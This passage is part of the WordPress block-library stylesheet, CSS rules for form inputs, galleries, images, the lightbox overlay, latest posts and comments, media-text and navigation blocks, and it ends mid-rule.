:where(.wp-block-form-input__input)[type=date],:where(.wp-block-form-input__input)[type=datetime-local],:where(.wp-block-form-input__input)[type=datetime],:where(.wp-block-form-input__input)[type=email],:where(.wp-block-form-input__input)[type=month],:where(.wp-block-form-input__input)[type=number],:where(.wp-block-form-input__input)[type=password],:where(.wp-block-form-input__input)[type=search],:where(.wp-block-form-input__input)[type=tel],:where(.wp-block-form-input__input)[type=text],:where(.wp-block-form-input__input)[type=time],:where(.wp-block-form-input__input)[type=url],:where(.wp-block-form-input__input)[type=week]{ border-style:solid; border-width:1px; line-height:2; min-height:2em; } textarea.wp-block-form-input__input{ min-height:10em; } .blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){ display:flex; flex-wrap:wrap; list-style-type:none; margin:0; padding:0; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{ display:flex; flex-direction:column; flex-grow:1; justify-content:center; margin:0 1em 1em 0; position:relative; width:calc(50% - 1em); } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n){ margin-right:0; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figure{ align-items:flex-end; display:flex; height:100%; justify-content:flex-start; margin:0; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item img{ display:block; height:auto; max-width:100%; width:auto; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption{ background:linear-gradient(0deg, #000000b3, #0000004d 70%, #0000); bottom:0; box-sizing:border-box; color:#fff; font-size:.8em; margin:0; max-height:100%; overflow:auto; padding:3em .77em .7em; position:absolute; text-align:center; width:100%; z-index:2; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{ display:inline; } .blocks-gallery-grid:not(.has-nested-images) figcaption,.wp-block-gallery:not(.has-nested-images) figcaption{ flex-grow:1; } .blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item img{ flex:1; height:100%; object-fit:cover; width:100%; } .blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item{ margin-right:0; width:100%; } @media (min-width:600px){ .blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item{ margin-right:1em; width:calc(33.33333% - .66667em); } .blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item{ margin-right:1em; width:calc(25% - .75em); } .blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item{ margin-right:1em; width:calc(20% - .8em); } .blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item{ margin-right:1em; width:calc(16.66667% - .83333em); } .blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item{ margin-right:1em; width:calc(14.28571% - .85714em); } .blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item{ margin-right:1em; width:calc(12.5% - .875em); } .blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n){ margin-right:0; } } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:last-child,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:last-child{ margin-right:0; } .blocks-gallery-grid:not(.has-nested-images).alignleft,.blocks-gallery-grid:not(.has-nested-images).alignright,.wp-block-gallery:not(.has-nested-images).alignleft,.wp-block-gallery:not(.has-nested-images).alignright{ max-width:420px; width:100%; } .blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{ justify-content:center; } .wp-block-gallery:not(.is-cropped) .blocks-gallery-item{ align-self:flex-start; } figure.wp-block-gallery.has-nested-images{ align-items:normal; } .wp-block-gallery.has-nested-images figure.wp-block-image:not(#individual-image){ margin:0; width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)/2); } .wp-block-gallery.has-nested-images figure.wp-block-image{ box-sizing:border-box; display:flex; flex-direction:column; flex-grow:1; justify-content:center; max-width:100%; position:relative; } .wp-block-gallery.has-nested-images figure.wp-block-image>a,.wp-block-gallery.has-nested-images figure.wp-block-image>div{ flex-direction:column; flex-grow:1; margin:0; } .wp-block-gallery.has-nested-images figure.wp-block-image img{ display:block; height:auto; max-width:100% !important; width:auto; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image:has(figcaption):before{ bottom:0; left:0; max-height:100%; position:absolute; right:0; } .wp-block-gallery.has-nested-images figure.wp-block-image:has(figcaption):before{ backdrop-filter:blur(3px); content:""; height:100%; -webkit-mask-image:linear-gradient(0deg, #000 20%, #0000); mask-image:linear-gradient(0deg, #000 20%, #0000); max-height:40%; pointer-events:none; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{ box-sizing:border-box; color:#fff; font-size:13px; margin:0; overflow:auto; padding:1em; text-align:center; text-shadow:0 0 1.5px #000; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar{ height:12px; width:12px; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-track{ background-color:initial; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:initial; border:3px solid #0000; border-radius:8px; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover::-webkit-scrollbar-thumb{ background-color:#fffc; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{ scrollbar-color:#0000 #0000; scrollbar-gutter:stable both-edges; scrollbar-width:thin; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover{ scrollbar-color:#fffc #0000; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{ will-change:transform; } @media (hover:none){ .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{ scrollbar-color:#fffc #0000; } } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{ background:linear-gradient(0deg, #0006, #0000); } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption img{ display:inline; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption a{ color:inherit; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border img{ box-sizing:border-box; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>a,.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>div,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>a,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>div{ flex:1 1 auto; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded figcaption{ background:none; color:inherit; flex:initial; margin:0; padding:10px 10px 9px; position:relative; text-shadow:none; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border:before,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded:before{ content:none; } .wp-block-gallery.has-nested-images figcaption{ flex-basis:100%; flex-grow:1; text-align:center; } .wp-block-gallery.has-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){ margin-bottom:auto; margin-top:0; } .wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){ align-self:inherit; } .wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>div:not(.components-drop-zone){ display:flex; } .wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) img{ flex:1 0 0%; height:100%; object-fit:cover; width:100%; } .wp-block-gallery.has-nested-images.columns-1 figure.wp-block-image:not(#individual-image){ width:100%; } @media (min-width:600px){ .wp-block-gallery.has-nested-images.columns-3 figure.wp-block-image:not(#individual-image){ width:calc(33.33333% - var(--wp--style--unstable-gallery-gap, 16px)*.66667); } .wp-block-gallery.has-nested-images.columns-4 figure.wp-block-image:not(#individual-image){ width:calc(25% - var(--wp--style--unstable-gallery-gap, 16px)*.75); } .wp-block-gallery.has-nested-images.columns-5 figure.wp-block-image:not(#individual-image){ width:calc(20% - var(--wp--style--unstable-gallery-gap, 16px)*.8); } .wp-block-gallery.has-nested-images.columns-6 figure.wp-block-image:not(#individual-image){ width:calc(16.66667% - var(--wp--style--unstable-gallery-gap, 16px)*.83333); } .wp-block-gallery.has-nested-images.columns-7 figure.wp-block-image:not(#individual-image){ width:calc(14.28571% - var(--wp--style--unstable-gallery-gap, 16px)*.85714); } .wp-block-gallery.has-nested-images.columns-8 figure.wp-block-image:not(#individual-image){ width:calc(12.5% - var(--wp--style--unstable-gallery-gap, 16px)*.875); } .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image){ width:calc(33.33% - var(--wp--style--unstable-gallery-gap, 16px)*.66667); } .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2),.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){ width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5); } .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:last-child{ width:100%; } } .wp-block-gallery.has-nested-images.alignleft,.wp-block-gallery.has-nested-images.alignright{ max-width:420px; width:100%; } .wp-block-gallery.has-nested-images.aligncenter{ justify-content:center; } .wp-block-group{ box-sizing:border-box; } :where(.wp-block-group.wp-block-group-is-layout-constrained){ position:relative; } h1:where(.wp-block-heading).has-background,h2:where(.wp-block-heading).has-background,h3:where(.wp-block-heading).has-background,h4:where(.wp-block-heading).has-background,h5:where(.wp-block-heading).has-background,h6:where(.wp-block-heading).has-background{ padding:1.25em 2.375em; } h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){ rotate:180deg; } .wp-block-image>a,.wp-block-image>figure>a{ display:inline-block; } .wp-block-image img{ box-sizing:border-box; height:auto; max-width:100%; vertical-align:bottom; } @media not (prefers-reduced-motion){ .wp-block-image img.hide{ visibility:hidden; } .wp-block-image img.show{ animation:show-content-image .4s; } } .wp-block-image[style*=border-radius] img,.wp-block-image[style*=border-radius]>a{ border-radius:inherit; } .wp-block-image.has-custom-border img{ box-sizing:border-box; } .wp-block-image.aligncenter{ text-align:center; } .wp-block-image.alignfull>a,.wp-block-image.alignwide>a{ width:100%; } .wp-block-image.alignfull img,.wp-block-image.alignwide img{ height:auto; width:100%; } .wp-block-image .aligncenter,.wp-block-image .alignleft,.wp-block-image .alignright,.wp-block-image.aligncenter,.wp-block-image.alignleft,.wp-block-image.alignright{ display:table; } .wp-block-image .aligncenter>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image .alignright>figcaption,.wp-block-image.aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image.alignright>figcaption{ caption-side:bottom; display:table-caption; } .wp-block-image .alignleft{ float:left; margin:.5em 1em .5em 0; } .wp-block-image .alignright{ float:right; margin:.5em 0 .5em 1em; } .wp-block-image .aligncenter{ margin-left:auto; margin-right:auto; } .wp-block-image :where(figcaption){ margin-bottom:1em; margin-top:.5em; } .wp-block-image.is-style-circle-mask img{ border-radius:9999px; } @supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){ .wp-block-image.is-style-circle-mask img{ border-radius:0; -webkit-mask-image:url('data:image/svg+xml;utf8,'); mask-image:url('data:image/svg+xml;utf8,'); mask-mode:alpha; -webkit-mask-position:center; mask-position:center; -webkit-mask-repeat:no-repeat; mask-repeat:no-repeat; -webkit-mask-size:contain; mask-size:contain; } } :root :where(.wp-block-image.is-style-rounded img,.wp-block-image .is-style-rounded img){ border-radius:9999px; } .wp-block-image figure{ margin:0; } .wp-lightbox-container{ display:flex; flex-direction:column; position:relative; } .wp-lightbox-container img{ cursor:zoom-in; } .wp-lightbox-container img:hover+button{ opacity:1; } .wp-lightbox-container button{ align-items:center; backdrop-filter:blur(16px) saturate(180%); background-color:#5a5a5a40; border:none; border-radius:4px; cursor:zoom-in; display:flex; height:20px; justify-content:center; opacity:0; padding:0; position:absolute; right:16px; text-align:center; top:16px; width:20px; z-index:100; } @media not (prefers-reduced-motion){ .wp-lightbox-container button{ transition:opacity .2s ease; } } .wp-lightbox-container button:focus-visible{ outline:3px auto #5a5a5a40; outline:3px auto -webkit-focus-ring-color; outline-offset:3px; } .wp-lightbox-container button:hover{ cursor:pointer; opacity:1; } .wp-lightbox-container button:focus{ opacity:1; } .wp-lightbox-container button:focus,.wp-lightbox-container button:hover,.wp-lightbox-container button:not(:hover):not(:active):not(.has-background){ background-color:#5a5a5a40; border:none; } .wp-lightbox-overlay{ box-sizing:border-box; cursor:zoom-out; height:100vh; left:0; overflow:hidden; position:fixed; top:0; visibility:hidden; width:100%; z-index:100000; } .wp-lightbox-overlay .close-button{ align-items:center; cursor:pointer; display:flex; justify-content:center; min-height:40px; min-width:40px; padding:0; position:absolute; right:calc(env(safe-area-inset-right) + 16px); top:calc(env(safe-area-inset-top) + 16px); z-index:5000000; } .wp-lightbox-overlay .close-button:focus,.wp-lightbox-overlay .close-button:hover,.wp-lightbox-overlay .close-button:not(:hover):not(:active):not(.has-background){ background:none; border:none; } .wp-lightbox-overlay .lightbox-image-container{ height:var(--wp--lightbox-container-height); left:50%; overflow:hidden; position:absolute; top:50%; transform:translate(-50%, -50%); transform-origin:top left; width:var(--wp--lightbox-container-width); z-index:9999999999; } .wp-lightbox-overlay .wp-block-image{ align-items:center; box-sizing:border-box; display:flex; height:100%; justify-content:center; margin:0; position:relative; transform-origin:0 0; width:100%; z-index:3000000; } .wp-lightbox-overlay .wp-block-image img{ height:var(--wp--lightbox-image-height); min-height:var(--wp--lightbox-image-height); min-width:var(--wp--lightbox-image-width); width:var(--wp--lightbox-image-width); } .wp-lightbox-overlay .wp-block-image figcaption{ display:none; } .wp-lightbox-overlay button{ background:none; border:none; } .wp-lightbox-overlay .scrim{ background-color:#fff; height:100%; opacity:.9; position:absolute; width:100%; z-index:2000000; } .wp-lightbox-overlay.active{ visibility:visible; } @media not (prefers-reduced-motion){ .wp-lightbox-overlay.active{ animation:turn-on-visibility .25s both; } .wp-lightbox-overlay.active img{ animation:turn-on-visibility .35s both; } .wp-lightbox-overlay.show-closing-animation:not(.active){ animation:turn-off-visibility .35s both; } .wp-lightbox-overlay.show-closing-animation:not(.active) img{ animation:turn-off-visibility .25s both; } .wp-lightbox-overlay.zoom.active{ animation:none; opacity:1; visibility:visible; } .wp-lightbox-overlay.zoom.active .lightbox-image-container{ animation:lightbox-zoom-in .4s; } .wp-lightbox-overlay.zoom.active .lightbox-image-container img{ animation:none; } .wp-lightbox-overlay.zoom.active .scrim{ animation:turn-on-visibility .4s forwards; } .wp-lightbox-overlay.zoom.show-closing-animation:not(.active){ animation:none; } .wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container{ animation:lightbox-zoom-out .4s; } .wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container img{ animation:none; } .wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .scrim{ animation:turn-off-visibility .4s forwards; } } @keyframes show-content-image{ 0%{ visibility:hidden; } 99%{ visibility:hidden; } to{ visibility:visible; } } @keyframes turn-on-visibility{ 0%{ opacity:0; } to{ opacity:1; } } @keyframes turn-off-visibility{ 0%{ opacity:1; visibility:visible; } 99%{ opacity:0; visibility:visible; } to{ opacity:0; visibility:hidden; } } @keyframes lightbox-zoom-in{ 0%{ transform:translate(calc((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position)), calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale)); } to{ transform:translate(-50%, -50%) scale(1); } } @keyframes lightbox-zoom-out{ 0%{ transform:translate(-50%, -50%) scale(1); visibility:visible; } 99%{ visibility:visible; } to{ transform:translate(calc((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position)), calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale)); visibility:hidden; } } ol.wp-block-latest-comments{ box-sizing:border-box; margin-left:0; } :where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment)){ line-height:1.1; } :where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment-excerpt p)){ line-height:1.8; } .has-dates :where(.wp-block-latest-comments:not([style*=line-height])),.has-excerpts :where(.wp-block-latest-comments:not([style*=line-height])){ line-height:1.5; } .wp-block-latest-comments .wp-block-latest-comments{ padding-left:0; } .wp-block-latest-comments__comment{ list-style:none; margin-bottom:1em; } .has-avatars .wp-block-latest-comments__comment{ list-style:none; min-height:2.25em; } .has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-excerpt,.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-meta{ margin-left:3.25em; } .wp-block-latest-comments__comment-excerpt p{ font-size:.875em; margin:.36em 0 1.4em; } .wp-block-latest-comments__comment-date{ display:block; font-size:.75em; } .wp-block-latest-comments .avatar,.wp-block-latest-comments__comment-avatar{ border-radius:1.5em; display:block; float:left; height:2.5em; margin-right:.75em; width:2.5em; } .wp-block-latest-comments[class*=-font-size] a,.wp-block-latest-comments[style*=font-size] a{ font-size:inherit; } .wp-block-latest-posts{ box-sizing:border-box; } .wp-block-latest-posts.alignleft{ margin-right:2em; } .wp-block-latest-posts.alignright{ margin-left:2em; } .wp-block-latest-posts.wp-block-latest-posts__list{ list-style:none; } .wp-block-latest-posts.wp-block-latest-posts__list li{ clear:both; overflow-wrap:break-word; } .wp-block-latest-posts.is-grid{ display:flex; flex-wrap:wrap; } .wp-block-latest-posts.is-grid li{ margin:0 1.25em 1.25em 0; width:100%; } @media (min-width:600px){ .wp-block-latest-posts.columns-2 li{ width:calc(50% - .625em); } .wp-block-latest-posts.columns-2 li:nth-child(2n){ margin-right:0; } .wp-block-latest-posts.columns-3 li{ width:calc(33.33333% - .83333em); } .wp-block-latest-posts.columns-3 li:nth-child(3n){ margin-right:0; } .wp-block-latest-posts.columns-4 li{ width:calc(25% - .9375em); } .wp-block-latest-posts.columns-4 li:nth-child(4n){ margin-right:0; } .wp-block-latest-posts.columns-5 li{ width:calc(20% - 1em); } .wp-block-latest-posts.columns-5 li:nth-child(5n){ margin-right:0; } .wp-block-latest-posts.columns-6 li{ width:calc(16.66667% - 1.04167em); } .wp-block-latest-posts.columns-6 li:nth-child(6n){ margin-right:0; } } :root :where(.wp-block-latest-posts.is-grid){ padding:0; } :root :where(.wp-block-latest-posts.wp-block-latest-posts__list){ padding-left:0; } .wp-block-latest-posts__post-author,.wp-block-latest-posts__post-date{ display:block; font-size:.8125em; } .wp-block-latest-posts__post-excerpt,.wp-block-latest-posts__post-full-content{ margin-bottom:1em; margin-top:.5em; } .wp-block-latest-posts__featured-image a{ display:inline-block; } .wp-block-latest-posts__featured-image img{ height:auto; max-width:100%; width:auto; } .wp-block-latest-posts__featured-image.alignleft{ float:left; margin-right:1em; } .wp-block-latest-posts__featured-image.alignright{ float:right; margin-left:1em; } .wp-block-latest-posts__featured-image.aligncenter{ margin-bottom:1em; text-align:center; } ol,ul{ box-sizing:border-box; } :root :where(.wp-block-list.has-background){ padding:1.25em 2.375em; } .wp-block-loginout{ box-sizing:border-box; } .wp-block-math{ overflow-x:auto; overflow-y:hidden; } .wp-block-media-text{ box-sizing:border-box; direction:ltr; display:grid; grid-template-columns:50% 1fr; grid-template-rows:auto; } .wp-block-media-text.has-media-on-the-right{ grid-template-columns:1fr 50%; } .wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__media{ align-self:start; } .wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__media,.wp-block-media-text>.wp-block-media-text__content,.wp-block-media-text>.wp-block-media-text__media{ align-self:center; } .wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__media{ align-self:end; } .wp-block-media-text>.wp-block-media-text__media{ grid-column:1; grid-row:1; margin:0; } .wp-block-media-text>.wp-block-media-text__content{ direction:ltr; grid-column:2; grid-row:1; padding:0 8%; word-break:break-word; } .wp-block-media-text.has-media-on-the-right>.wp-block-media-text__media{ grid-column:2; grid-row:1; } .wp-block-media-text.has-media-on-the-right>.wp-block-media-text__content{ grid-column:1; grid-row:1; } .wp-block-media-text__media a{ display:block; } .wp-block-media-text__media img,.wp-block-media-text__media video{ height:auto; max-width:unset; vertical-align:middle; width:100%; } .wp-block-media-text.is-image-fill>.wp-block-media-text__media{ background-size:cover; height:100%; min-height:250px; } .wp-block-media-text.is-image-fill>.wp-block-media-text__media>a{ display:block; height:100%; } .wp-block-media-text.is-image-fill>.wp-block-media-text__media img{ height:1px; margin:-1px; overflow:hidden; padding:0; position:absolute; width:1px; clip:rect(0, 0, 0, 0); border:0; } .wp-block-media-text.is-image-fill-element>.wp-block-media-text__media{ height:100%; min-height:250px; position:relative; } .wp-block-media-text.is-image-fill-element>.wp-block-media-text__media>a{ display:block; height:100%; } .wp-block-media-text.is-image-fill-element>.wp-block-media-text__media img{ height:100%; object-fit:cover; position:absolute; width:100%; } @media (max-width:600px){ .wp-block-media-text.is-stacked-on-mobile{ grid-template-columns:100% !important; } .wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__media{ grid-column:1; grid-row:1; } .wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__content{ grid-column:1; grid-row:2; } } .wp-block-navigation{ position:relative; } .wp-block-navigation ul{ margin-bottom:0; margin-left:0; margin-top:0; padding-left:0; } .wp-block-navigation ul,.wp-block-navigation ul li{ list-style:none; padding:0; } .wp-block-navigation .wp-block-navigation-item{ align-items:center; display:flex; position:relative; } .wp-block-navigation .wp-block-navigation-item .wp-block-navigation__submenu-container:empty{ display:none; } .wp-block-navigation .wp-block-navigation-item__content{ display:block; z-index:1; } .wp-block-navigation .wp-block-navigation-item__content.wp-block-navigation-item__content{ color:inherit; } .wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-underline 